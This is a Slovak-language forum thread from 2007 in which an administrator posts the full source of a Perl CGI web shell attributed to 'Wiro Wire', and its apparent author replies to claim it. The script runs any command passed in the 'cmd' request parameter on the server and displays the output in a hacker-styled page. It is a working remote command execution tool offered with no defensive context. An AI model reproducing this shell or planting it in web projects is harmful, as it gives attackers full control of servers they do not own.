|
 | | |
| Autor | Správa |
JanoF
 Správca fóra
 Založený: 01.05.2005 Príspevky: 8736 Bydlisko: Bratislava Vek: 27
 | Zaslal: St 29.08.07 16:26 |   |
| kód: | #!/usr/bin/perl
use CGI;
my $cgi = new CGI;
my $cmd = $cgi->param("cmd");
@command = `$cmd`;
print "Content-type: text/html\r\n\r\n";
print '
<style>
<!--
html,body {font-family:arial; font-size:10pt}
table,tr,td { border: 1px solid green ; font-size:10pt;}
td { padding:5px}
a {color: green; text-decoration:none}
a:hover {color: green; text-decoration:underline}
input { background-color: #000; color: #FFFFFF; border: 1px solid #0F5;}
-->
</style>
<body style="background-color: rgb(0, 0, 0); color: rgb(0, 205, 0);" alink="#ee0000" link="#0000ee" vlink="#551a8b">
<form name="daform" action="shell.cgi" method="get" enctype="text/plain">
wire@webshell# <input cmd="cmd" NAME="cmd" size="15"><input type="submit" value="Enter"><br>
</form>
<table cellspacing=1 >
<tr><td style="background-color:black; color:green; font-weight:bold"width=600 height=410 VALIGN=TOP>
';
print "<pre>wire\@webshell> $cmd \n";
foreach $line (@command) {
print "$line";
}
print '</pre></td></tr></table>';
print '<br><br>
by Wiro Wire @ 2006
';
exit (0); |
Vytvoril ho Wiro. |
_________________ Skrinka: Nexus Morpho & Enermax UCTB12P | Zdroj: Enermax EMG800AWT 800W | Základná doska: Asus Rampage III Gene | Procesor: Intel Core i7 990X Extreme Edition 3.46 GHz & Scythe Susanoo SCSO-1000 | Pamäť: Kingston HyperX XMP 24 GB DDR3 1600 MHz | Grafická karta: Asus GeForce GT 440 1 GB DDR3 & Thermalright HR-03 | Pevný disk: Intel SSD 510 Series 250 GB & Hitachi Deskstar 5K4000 4000 GB | Optická mechanika: Plextor PX-820SA | Čítačka kariet: Akasa AK-ICR-11 | Klávesnica: Logitech G19 | Myš: Logitech G9x & Razer Kabuto | Monitor: 24" LCD Eizo FlexScan S2431WE | Reproduktory: Logitech Z-2300 | Operačný systém: Microsoft Windows 7 & FreeBSD 9 | Záložný zdroj: APC Back-UPS ES 700 | Spotreba: Idle - 200W / Burn - 400W | Mobil: Nokia N9 64 GB | |
       |
 |
wire
 Užívateľ
 Založený: 13.07.2006 Príspevky: 61
 | Zaslal: Po 22.10.07 22:49 |   |
jej to je moj shell ) |
| |
     |
 |
|
Nemôžete pridávať nové témy do tohto fóra. Nemôžete odpovedať na témy v tomto fóre. Nemôžete upravovať svoje príspevky v tomto fóre. Nemôžete mazať svoje príspevky v tomto fóre. Nemôžete hlasovať v tomto fóre.
|
| |